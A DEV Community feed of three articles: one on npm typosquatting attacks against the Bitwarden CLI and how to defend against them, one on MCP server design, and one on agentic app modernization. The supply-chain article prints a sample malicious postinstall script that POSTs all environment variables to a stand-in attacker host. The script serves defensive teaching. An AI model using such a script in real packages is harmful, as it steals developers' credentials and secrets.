DEV Community: logiQode The latest articles on DEV Community by logiQode (@logiqode). https://dev.to/logiqode https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3895841%2F20431d54-9597-4a1f-abf5-604f466b3f97.png DEV Community: logiQode https://dev.to/logiqode en Supply Chain Attacks Targeting Bitwarden CLI and How to Defend logiQode Fri, 24 Apr 2026 14:05:02 +0000 https://dev.to/logiqode/supply-chain-attacks-targeting-bitwarden-cli-and-how-to-defend-3jfi https://dev.to/logiqode/supply-chain-attacks-targeting-bitwarden-cli-and-how-to-defend-3jfi <p>Supply chain attacks have shifted from theoretical threat to routine incident. The recent discovery by Socket's research team — malicious packages impersonating the official Bitwarden CLI (<code>@bitwarden/cli</code>) as part of an ongoing Checkmarx-linked campaign — is a sharp reminder that package registries are an active attack surface, not a passive distribution channel. This article breaks down how the attack works, why it is effective, and what concrete steps you can take right now to reduce your exposure.</p> <h2> What Actually Happened </h2> <p>Attackers published packages to npm with names closely resembling the legitimate <code>@bitwarden/cli</code> package. The technique is called <strong>typosquatting</strong> combined with <strong>dependency confusion</strong>: the malicious packages are crafted to look plausible enough that automated install scripts, CI pipelines, or copy-paste developer workflows pull them in without scrutiny.</p> <p>Once installed, the packages execute a postinstall lifecycle script. This is a standard npm hook — entirely legitimate in normal tooling — that the attackers weaponized to run credential-harvesting code immediately after <code>npm install</code> completes. Because Bitwarden CLI is a secrets management tool, any environment that has it installed is likely to also have vault credentials, environment variables, or tokens in scope.</p> <p>The campaign is attributed to the same threat actor tracked by Checkmarx, who has been running similar operations across multiple ecosystems for months. The pattern is consistent: pick a high-value target package (one that touches secrets or has broad install reach), register a confusable name, and harvest whatever the runtime environment exposes.</p> <h2> Why <code>postinstall</code> Scripts Are a Persistent Risk </h2> <p>The <code>postinstall</code> hook in <code>package.json</code> runs arbitrary shell commands with the same privileges as the user executing <code>npm install</code>. There is no sandboxing, no permission prompt, no capability restriction.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"totally-legit-package"</span><span class="p">,</span><span class="w"> </span><span class="nl">"version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1.0.0"</span><span class="p">,</span><span class="w"> </span><span class="nl">"scripts"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"postinstall"</span><span class="p">:</span><span class="w"> </span><span class="s2">"node ./scripts/setup.js"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>That <code>setup.js</code> can do anything the current user can do: read <code>~/.ssh</code>, enumerate environment variables, exfiltrate <code>process.env</code>, or open a reverse shell. The legitimate ecosystem relies on this hook for genuinely useful work — native module compilation, binary downloads, code generation — so disabling it wholesale breaks real tooling.</p> <p>A common pattern in production CI environments is that the pipeline runs as a service account with broad read access to secrets stores. When an attacker's postinstall script calls <code>process.env</code>, it may find <code>AWS_ACCESS_KEY_ID</code>, <code>NPM_TOKEN</code>, <code>DATABASE_URL</code>, or Bitwarden master credentials sitting in the environment, ready to exfiltrate over a simple HTTPS request to an attacker-controlled endpoint.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// What a malicious postinstall script might look like (simplified)</span> <span class="kd">const</span> <span class="nx">https</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">https</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">payload</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">({</span> <span class="na">env</span><span class="p">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">,</span> <span class="na">cwd</span><span class="p">:</span> <span class="nx">process</span><span class="p">.</span><span class="nf">cwd</span><span class="p">(),</span> <span class="na">platform</span><span class="p">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">platform</span><span class="p">,</span> <span class="p">});</span> <span class="kd">const</span> <span class="nx">req</span> <span class="o">=</span> <span class="nx">https</span><span class="p">.</span><span class="nf">request</span><span class="p">({</span> <span class="na">hostname</span><span class="p">:</span> <span class="dl">'</span><span class="s1">attacker-controlled.example.com</span><span class="dl">'</span><span class="p">,</span> <span class="na">path</span><span class="p">:</span> <span class="dl">'</span><span class="s1">/collect</span><span class="dl">'</span><span class="p">,</span> <span class="na">method</span><span class="p">:</span> <span class="dl">'</span><span class="s1">POST</span><span class="dl">'</span><span class="p">,</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">application/json</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Content-Length</span><span class="dl">'</span><span class="p">:</span> <span class="nx">Buffer</span><span class="p">.</span><span class="nf">byteLength</span><span class="p">(</span><span class="nx">payload</span><span class="p">)</span> <span class="p">},</span> <span class="p">});</span> <span class="nx">req</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="nx">payload</span><span class="p">);</span> <span class="nx">req</span><span class="p">.</span><span class="nf">end</span><span class="p">();</span> </code></pre> </div> <p>This runs silently, produces no visible output, and completes before your build step even starts.</p> <h2> How Typosquatting and Dependency Confusion Scale This Attack </h2> <p>Typosquatting works because humans make mistakes and automation does not validate intent. A developer typing <code>@bitarden/cli</code> or a script that resolves <code>bitwarden-cli</code> (without the scope) can silently pull the wrong package.</p> <p>Dependency confusion is a related but distinct vector: if your internal package registry is misconfigured, npm may resolve a package name against the public registry instead of your private one, especially when version ranges are involved. An attacker who knows your internal package names (often leaked in error messages, job postings, or public GitHub repos) can register the same name publicly with a higher version number. npm's default resolution will prefer the higher version from the public registry.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Check what registry a package would resolve from before installing</span> npm view @bitwarden/cli dist-tags <span class="nt">--registry</span> https://registry.npmjs.org <span class="c"># For scoped packages in a monorepo, confirm .npmrc scoping is explicit</span> <span class="nb">cat</span> .npmrc <span class="c"># Should contain something like:</span> <span class="c"># @bitwarden:registry=https://registry.npmjs.org</span> <span class="c"># @mycompany:registry=https://your-private-registry.example.com</span> </code></pre> </div> <p>Without explicit scope-to-registry mappings, you are relying on npm's default fallback behavior, which attackers have learned to exploit.</p> <h2> Practical Defenses You Can Implement Today </h2> <h3> 1. Pin exact versions and verify integrity </h3> <p>Use <code>package-lock.json</code> or <code>yarn.lock</code> and commit it. Never run <code>npm install</code> without a lockfile in production or CI. The lockfile records the exact resolved version and the package integrity hash (a <code>sha512</code> digest of the tarball). If the tarball changes — even for the same version — the hash will not match and the install will fail.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># In CI, always use ci instead of install — it enforces the lockfile</span> npm ci </code></pre> </div> <p><code>npm ci</code> refuses to install if <code>package-lock.json</code> is absent or out of sync with <code>package.json</code>. It also performs integrity verification against recorded hashes.</p> <h3> 2. Disable or audit postinstall scripts selectively </h3> <p>You can prevent lifecycle scripts from running with the <code>--ignore-scripts</code> flag:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>npm ci <span class="nt">--ignore-scripts</span> </code></pre> </div> <p>This breaks packages that legitimately need postinstall (native bindings, for example), but it is a reasonable default for security-sensitive environments. A better approach is to audit which packages in your dependency tree actually need lifecycle scripts and allowlist only those.</p> <p>Tools like <a href="https://socket.dev" rel="noopener noreferrer"><code>socket</code></a> and <a href="https://github.com/jeemok/better-npm-audit" rel="noopener noreferrer"><code>better-npm-audit</code></a> can flag packages with postinstall scripts before they run.</p> <h3> 3. Use a private registry with upstream filtering </h3> <p>Hosting Artifactory, Nexus, or AWS CodeArtifact as a proxy between your developers and the public registry lets you:</p> <ul> <li>Cache approved versions and block unapproved ones</li> <li>Enforce explicit scope-to-registry mappings</li> <li>Scan packages before they enter your environment</li> <li>Prevent dependency confusion by configuring <code>--registry</code> at the project level and disabling public fallback for internal scopes </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># In your project's .npmrc, lock internal scopes to your registry</span> <span class="c"># and public scopes to npmjs</span> @mycompany:registry<span class="o">=</span>https://your-private-registry.example.com @bitwarden:registry<span class="o">=</span>https://registry.npmjs.org <span class="nv">registry</span><span class="o">=</span>https://your-private-registry.example.com </code></pre> </div> <p>With this configuration, npm will never resolve <code>@mycompany/*</code> packages from the public registry, closing the dependency confusion vector.</p> <h3> 4. Integrate supply chain scanning into CI </h3> <p>Static analysis of <code>package.json</code> and lockfiles can catch suspicious packages before they ever run. Socket's scanner (the same team that discovered this campaign) analyzes packages for behavioral signals — postinstall scripts that make network calls, obfuscated code, unusual file access patterns — rather than relying solely on known-bad signature lists.</p> <p>Add a scan step early in your pipeline, before any install:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="c1"># Example GitHub Actions step</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Socket Security Scan</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">nicolo-ribaudo/socket-security-action@v1</span> <span class="na">with</span><span class="pi">:</span> <span class="na">api-key</span><span class="pi">:</span> <span class="s">${{ secrets.SOCKET_API_KEY }}</span> </code></pre> </div> <p>Catching a malicious package at scan time, before <code>npm ci</code> runs, means the postinstall script never executes.</p> <h3> 5. Least-privilege CI environments </h3> <p>Even if a malicious postinstall script runs, it can only exfiltrate what it can access. Structuring CI pipelines so that the install step runs in an environment with no production secrets — using OIDC-based short-lived credentials rather than long-lived tokens, injecting secrets only into the steps that need them, and scoping IAM roles tightly — limits the blast radius.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="c1"># GitHub Actions: inject secrets only where needed</span> <span class="na">jobs</span><span class="pi">:</span> <span class="na">build</span><span class="pi">:</span> <span class="na">steps</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Install dependencies (no secrets in scope)</span> <span class="na">run</span><span class="pi">:</span> <span class="s">npm ci --ignore-scripts</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Deploy (secrets injected here only)</span> <span class="na">env</span><span class="pi">:</span> <span class="na">AWS_ROLE_ARN</span><span class="pi">:</span> <span class="s">${{ secrets.DEPLOY_ROLE }}</span> <span class="na">run</span><span class="pi">:</span> <span class="s">./deploy.sh</span> </code></pre> </div> <h2> Key Takeaways </h2> <p>Supply chain attacks succeed because they exploit trust: trust in package names, trust in registry integrity, trust in lifecycle hooks. The Bitwarden CLI campaign is not an anomaly — it is a repeatable playbook being run at scale.</p> <p>The defenses are not exotic:</p> <ul> <li> <strong>Lock and verify</strong>: commit lockfiles, use <code>npm ci</code>, validate integrity hashes.</li> <li> <strong>Restrict lifecycle scripts</strong>: run <code>--ignore-scripts</code> by default; audit exceptions.</li> <li> <strong>Control resolution</strong>: use a private registry proxy with explicit scope mappings to eliminate dependency confusion.</li> <li> <strong>Scan before install</strong>: integrate behavioral supply chain scanners into CI as a pre-install gate.</li> <li> <strong>Minimize secret exposure</strong>: apply least privilege to CI environments so a compromised postinstall script finds nothing worth exfiltrating.</li> </ul> <p>The full technical breakdown of the campaign is available in <a href="https://socket.dev/blog/bitwarden-cli-compromised" rel="noopener noreferrer">Socket's original report</a>. The npm ecosystem's openness is a feature — the absence of install-time isolation is a structural gap that defenders need to compensate for with process and tooling, because the registry itself cannot do it for you.</p> security npm supplychain devops Don't Build Your MCP Server as an API Wrapper logiQode Fri, 24 Apr 2026 13:40:01 +0000 https://dev.to/logiqode/title-dont-build-your-mcp-server-as-an-api-wrapper-359n https://dev.to/logiqode/title-dont-build-your-mcp-server-as-an-api-wrapper-359n <p>The Model Context Protocol (MCP) is gaining traction as the standard way to connect language models to external systems. And the first instinct of most engineers who already have a REST API is entirely predictable: wrap it. One tool per endpoint, one parameter per query string, done in an afternoon. It compiles, it runs, the model can technically call it — and it will perform badly in production. Here is why that instinct is wrong, and what to do instead.</p> <h2> The Obvious Trap: One Tool Per Endpoint </h2> <p>Imagine a typical REST API for a customer support platform:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">GET /responses GET /responses/:id PUT /responses/:id POST /responses/:id/assign GET /responses/:id/messages </span></code></pre> </div> <p>The naive MCP translation looks like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="nx">server</span><span class="p">.</span><span class="nf">tool</span><span class="p">(</span><span class="dl">"</span><span class="s2">list_responses</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span> <span class="na">status</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">string</span><span class="p">().</span><span class="nf">optional</span><span class="p">()</span> <span class="p">},</span> <span class="k">async </span><span class="p">({</span> <span class="nx">status</span> <span class="p">})</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">api</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">/responses</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span> <span class="na">params</span><span class="p">:</span> <span class="p">{</span> <span class="nx">status</span> <span class="p">}</span> <span class="p">});</span> <span class="k">return</span> <span class="p">{</span> <span class="na">content</span><span class="p">:</span> <span class="p">[{</span> <span class="na">type</span><span class="p">:</span> <span class="dl">"</span><span class="s2">text</span><span class="dl">"</span><span class="p">,</span> <span class="na">text</span><span class="p">:</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">data</span><span class="p">)</span> <span class="p">}]</span> <span class="p">};</span> <span class="p">});</span> <span class="nx">server</span><span class="p">.</span><span class="nf">tool</span><span class="p">(</span><span class="dl">"</span><span class="s2">get_response</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span> <span class="na">id</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">string</span><span class="p">()</span> <span class="p">},</span> <span class="k">async </span><span class="p">({</span> <span class="nx">id</span> <span class="p">})</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">api</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="s2">`/responses/</span><span class="p">${</span><span class="nx">id</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span> <span class="k">return</span> <span class="p">{</span> <span class="na">content</span><span class="p">:</span> <span class="p">[{</span> <span class="na">type</span><span class="p">:</span> <span class="dl">"</span><span class="s2">text</span><span class="dl">"</span><span class="p">,</span> <span class="na">text</span><span class="p">:</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">data</span><span class="p">)</span> <span class="p">}]</span> <span class="p">};</span> <span class="p">});</span> <span class="nx">server</span><span class="p">.</span><span class="nf">tool</span><span class="p">(</span><span class="dl">"</span><span class="s2">update_response</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span> <span class="na">id</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">string</span><span class="p">(),</span> <span class="na">body</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">string</span><span class="p">()</span> <span class="p">},</span> <span class="k">async </span><span class="p">({</span> <span class="nx">id</span><span class="p">,</span> <span class="nx">body</span> <span class="p">})</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">api</span><span class="p">.</span><span class="nf">put</span><span class="p">(</span><span class="s2">`/responses/</span><span class="p">${</span><span class="nx">id</span><span class="p">}</span><span class="s2">`</span><span class="p">,</span> <span class="p">{</span> <span class="nx">body</span> <span class="p">});</span> <span class="k">return</span> <span class="p">{</span> <span class="na">content</span><span class="p">:</span> <span class="p">[{</span> <span class="na">type</span><span class="p">:</span> <span class="dl">"</span><span class="s2">text</span><span class="dl">"</span><span class="p">,</span> <span class="na">text</span><span class="p">:</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">data</span><span class="p">)</span> <span class="p">}]</span> <span class="p">};</span> <span class="p">});</span> </code></pre> </div> <p>This is not an MCP server. It is an HTTP client with extra steps. The model now has to chain three or four tool calls to accomplish something a single well-designed tool could handle in one. Every extra round-trip is latency, token cost, and another surface for the model to misinterpret an intermediate result.</p> <h2> Group Tools Around Intent, Not Endpoints </h2> <p>Anthropic's own <a href="https://www.anthropic.com/news/model-context-protocol" rel="noopener noreferrer">guidance on building agents that reach production systems with MCP</a> makes this explicit: <strong>group tools around intent, not endpoints</strong>. The question to ask is not "what does the API expose?" but "what does the agent need to accomplish?"</p> <p>For the support platform above, the intents might be:</p> <ul> <li>Triage an incoming request (fetch it, read its thread, decide priority)</li> <li>Draft and send a reply</li> <li>Escalate to a human agent</li> <li>Close a resolved ticket</li> </ul> <p>Each of those is a single cognitive unit for the model. When you map tools to endpoints instead of intents, the model has to reconstruct that unit itself — from a list of low-level primitives — every time it reasons about a task. That reconstruction is error-prone and expensive.</p> <p>A better <code>triage_request</code> tool looks like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="nx">server</span><span class="p">.</span><span class="nf">tool</span><span class="p">(</span> <span class="dl">"</span><span class="s2">triage_request</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span> <span class="na">response_id</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">string</span><span class="p">().</span><span class="nf">describe</span><span class="p">(</span><span class="dl">"</span><span class="s2">The ID of the support response to triage</span><span class="dl">"</span><span class="p">),</span> <span class="p">},</span> <span class="k">async </span><span class="p">({</span> <span class="nx">response_id</span> <span class="p">})</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// Fan out internally — the model doesn't pay for these round-trips</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">response</span><span class="p">,</span> <span class="nx">messages</span><span class="p">]</span> <span class="o">=</span> <span class="k">await</span> <span class="nb">Promise</span><span class="p">.</span><span class="nf">all</span><span class="p">([</span> <span class="nx">api</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="s2">`/responses/</span><span class="p">${</span><span class="nx">response_id</span><span class="p">}</span><span class="s2">`</span><span class="p">),</span> <span class="nx">api</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="s2">`/responses/</span><span class="p">${</span><span class="nx">response_id</span><span class="p">}</span><span class="s2">/messages`</span><span class="p">),</span> <span class="p">]);</span> <span class="kd">const</span> <span class="nx">summary</span> <span class="o">=</span> <span class="p">{</span> <span class="na">id</span><span class="p">:</span> <span class="nx">response</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">id</span><span class="p">,</span> <span class="na">status</span><span class="p">:</span> <span class="nx">response</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">status</span><span class="p">,</span> <span class="na">customer</span><span class="p">:</span> <span class="nx">response</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">customer_email</span><span class="p">,</span> <span class="na">subject</span><span class="p">:</span> <span class="nx">response</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">subject</span><span class="p">,</span> <span class="na">message_count</span><span class="p">:</span> <span class="nx">messages</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">length</span><span class="p">,</span> <span class="na">last_message</span><span class="p">:</span> <span class="nx">messages</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nf">at</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)?.</span><span class="nx">body</span> <span class="o">??</span> <span class="kc">null</span><span class="p">,</span> <span class="na">created_at</span><span class="p">:</span> <span class="nx">response</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">created_at</span><span class="p">,</span> <span class="p">};</span> <span class="k">return</span> <span class="p">{</span> <span class="na">content</span><span class="p">:</span> <span class="p">[{</span> <span class="na">type</span><span class="p">:</span> <span class="dl">"</span><span class="s2">text</span><span class="dl">"</span><span class="p">,</span> <span class="na">text</span><span class="p">:</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="nx">summary</span><span class="p">)</span> <span class="p">}],</span> <span class="p">};</span> <span class="p">}</span> <span class="p">);</span> </code></pre> </div> <p>The model calls one tool, gets one structured answer, and can reason about what to do next. The two HTTP calls are an implementation detail — invisible to the model, parallelised, and handled with proper error boundaries in one place.</p> <h2> Tool Descriptions Are Part of the Interface </h2> <p>In a REST API, the contract lives in the URL, the HTTP verb, and the OpenAPI schema. In MCP, the contract lives in the tool name, the parameter descriptions, and the shape of the returned content. The model reads all of it.</p> <p>A parameter named <code>id</code> with no description forces the model to infer context from surrounding conversation. A parameter named <code>response_id</code> with <code>.describe("The ID of the support response to triage")</code> is self-documenting in the exact context where it matters — the model's prompt.</p> <p>This has a practical consequence: <strong>writing good tool descriptions is not documentation work, it is prompt engineering</strong>. A vague description will produce vague tool calls. In practice, teams often discover this only after seeing the model hallucinate parameter values that "made sense" given an ambiguous schema.</p> <p>Treat every <code>z.string()</code> as an opportunity to be precise:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">const</span> <span class="nx">TriageInput</span> <span class="o">=</span> <span class="nx">z</span><span class="p">.</span><span class="nf">object</span><span class="p">({</span> <span class="na">response_id</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">string</span><span class="p">().</span><span class="nf">describe</span><span class="p">(</span> <span class="dl">"</span><span class="s2">Unique identifier of the support response. Format: resp_XXXXXXXX</span><span class="dl">"</span> <span class="p">),</span> <span class="na">include_internal_notes</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">boolean</span><span class="p">().</span><span class="nf">optional</span><span class="p">().</span><span class="nf">describe</span><span class="p">(</span> <span class="dl">"</span><span class="s2">Set to true only when the agent has support-staff permissions. Defaults to false.</span><span class="dl">"</span> <span class="p">),</span> <span class="p">});</span> </code></pre> </div> <p>The description of <code>include_internal_notes</code> does two things: it sets a default expectation and it encodes a permission hint. The model will use that hint when deciding whether to set the flag.</p> <h2> Return Structured Data, Not Raw API Responses </h2> <p>Passing <code>JSON.stringify(res.data)</code> directly to the model is the equivalent of handing a junior analyst a raw database dump and asking for a summary. It works, but it wastes context window on fields the model will never use, and it couples your MCP server's behaviour to your API's internal schema.</p> <p>Instead, project the response down to what the intent actually requires:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> typescript function formatResponseForTriage(raw </code></pre> </div> mcp ai typescript architecture Agentic AI for App Modernization What the Accenture WaveMaker Bet Means logiQode Fri, 24 Apr 2026 13:20:02 +0000 https://dev.to/logiqode/title-agentic-ai-for-app-modernization-what-the-accenture-wavemaker-bet-means-gfk https://dev.to/logiqode/title-agentic-ai-for-app-modernization-what-the-accenture-wavemaker-bet-means-gfk <p>Legacy application modernization has always been expensive, slow, and risky — but for mid-market companies sitting on portfolios of aging Java, .NET, or COBOL systems, it has historically been nearly impossible to justify at scale. The Accenture–WaveMaker partnership targets exactly this gap, pairing a low-code platform with agentic AI orchestration to automate the most labor-intensive parts of the migration lifecycle. Understanding <em>why</em> this combination matters requires looking at where previous modernization attempts broke down.</p> <h2> The $3 Billion Problem Is Really a Complexity Problem </h2> <p>The "software gap" framing is easy to dismiss as analyst hyperbole, but the underlying mechanics are real. Mid-market organizations — roughly companies with 500 to 5,000 employees — typically carry application portfolios built across two or three technology generations. They lack the internal platform engineering capacity of large enterprises, yet their systems are too business-critical and too customized for a simple SaaS swap.</p> <p>Classic modernization playbooks fail here for a predictable reason: the ratio of discovery work to actual migration work is roughly 3:1. Before a single line of code is rewritten, teams spend months mapping data flows, reverse-engineering undocumented business rules, and building dependency graphs. This is exactly the kind of structured-but-tedious reasoning task that large language models handle well — and it is the first lever that agentic AI pulls.</p> <h2> What "Agentic" Actually Means in This Context </h2> <p>The word "agentic" is overloaded right now, so it is worth being precise. In the context of application modernization, an agentic AI system is one that can:</p> <ul> <li> <strong>Decompose</strong> a long-horizon goal (migrate this application) into a directed graph of subtasks</li> <li> <strong>Execute</strong> those subtasks using tools — static analysis, code generation, test runners, schema diffing</li> <li> <strong>Observe</strong> the output of each step and decide whether to proceed, retry, or escalate to a human</li> <li> <strong>Persist</strong> state across sessions so work is resumable</li> </ul> <p>This is meaningfully different from a chat interface that generates a migration plan. The agent actually drives the process. A simplified version of the orchestration loop looks like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">ChatOpenAI</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">@langchain/openai</span><span class="dl">"</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">AgentExecutor</span><span class="p">,</span> <span class="nx">createToolCallingAgent</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">langchain/agents</span><span class="dl">"</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">ChatPromptTemplate</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">@langchain/core/prompts</span><span class="dl">"</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">tool</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">@langchain/core/tools</span><span class="dl">"</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">z</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">zod</span><span class="dl">"</span><span class="p">;</span> <span class="c1">// Simplified tools representing what a modernization agent would use</span> <span class="kd">const</span> <span class="nx">analyzeSchema</span> <span class="o">=</span> <span class="nf">tool</span><span class="p">(</span> <span class="k">async </span><span class="p">({</span> <span class="nx">connectionString</span> <span class="p">})</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// In production: connect to legacy DB, extract DDL, return structured schema</span> <span class="k">return</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">({</span> <span class="na">tables</span><span class="p">:</span> <span class="mi">42</span><span class="p">,</span> <span class="na">foreignKeys</span><span class="p">:</span> <span class="mi">87</span><span class="p">,</span> <span class="na">orphanedTables</span><span class="p">:</span> <span class="mi">3</span> <span class="p">});</span> <span class="p">},</span> <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="dl">"</span><span class="s2">analyze_schema</span><span class="dl">"</span><span class="p">,</span> <span class="na">description</span><span class="p">:</span> <span class="dl">"</span><span class="s2">Analyze a legacy database schema and return structural metadata</span><span class="dl">"</span><span class="p">,</span> <span class="na">schema</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">object</span><span class="p">({</span> <span class="na">connectionString</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">string</span><span class="p">()</span> <span class="p">}),</span> <span class="p">}</span> <span class="p">);</span> <span class="kd">const</span> <span class="nx">generateMigrationPlan</span> <span class="o">=</span> <span class="nf">tool</span><span class="p">(</span> <span class="k">async </span><span class="p">({</span> <span class="nx">schemaMetadata</span><span class="p">,</span> <span class="nx">targetPlatform</span> <span class="p">})</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// In production: feed schema into a planning prompt, return ordered task list</span> <span class="k">return</span> <span class="s2">`Migration plan for </span><span class="p">${</span><span class="nx">targetPlatform</span><span class="p">}</span><span class="s2">: 1) migrate core tables, 2) resolve FK cycles, 3) port orphaned tables`</span><span class="p">;</span> <span class="p">},</span> <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="dl">"</span><span class="s2">generate_migration_plan</span><span class="dl">"</span><span class="p">,</span> <span class="na">description</span><span class="p">:</span> <span class="dl">"</span><span class="s2">Generate an ordered migration plan from schema metadata</span><span class="dl">"</span><span class="p">,</span> <span class="na">schema</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">object</span><span class="p">({</span> <span class="na">schemaMetadata</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">string</span><span class="p">(),</span> <span class="na">targetPlatform</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">string</span><span class="p">(),</span> <span class="p">}),</span> <span class="p">}</span> <span class="p">);</span> <span class="kd">const</span> <span class="nx">llm</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">ChatOpenAI</span><span class="p">({</span> <span class="na">model</span><span class="p">:</span> <span class="dl">"</span><span class="s2">gpt-4o</span><span class="dl">"</span><span class="p">,</span> <span class="na">temperature</span><span class="p">:</span> <span class="mi">0</span> <span class="p">});</span> <span class="kd">const</span> <span class="nx">tools</span> <span class="o">=</span> <span class="p">[</span><span class="nx">analyzeSchema</span><span class="p">,</span> <span class="nx">generateMigrationPlan</span><span class="p">];</span> <span class="kd">const</span> <span class="nx">prompt</span> <span class="o">=</span> <span class="nx">ChatPromptTemplate</span><span class="p">.</span><span class="nf">fromMessages</span><span class="p">([</span> <span class="p">[</span><span class="dl">"</span><span class="s2">system</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">You are a migration agent. Use tools to analyze legacy systems and produce actionable plans.</span><span class="dl">"</span><span class="p">],</span> <span class="p">[</span><span class="dl">"</span><span class="s2">human</span><span class="dl">"</span><span 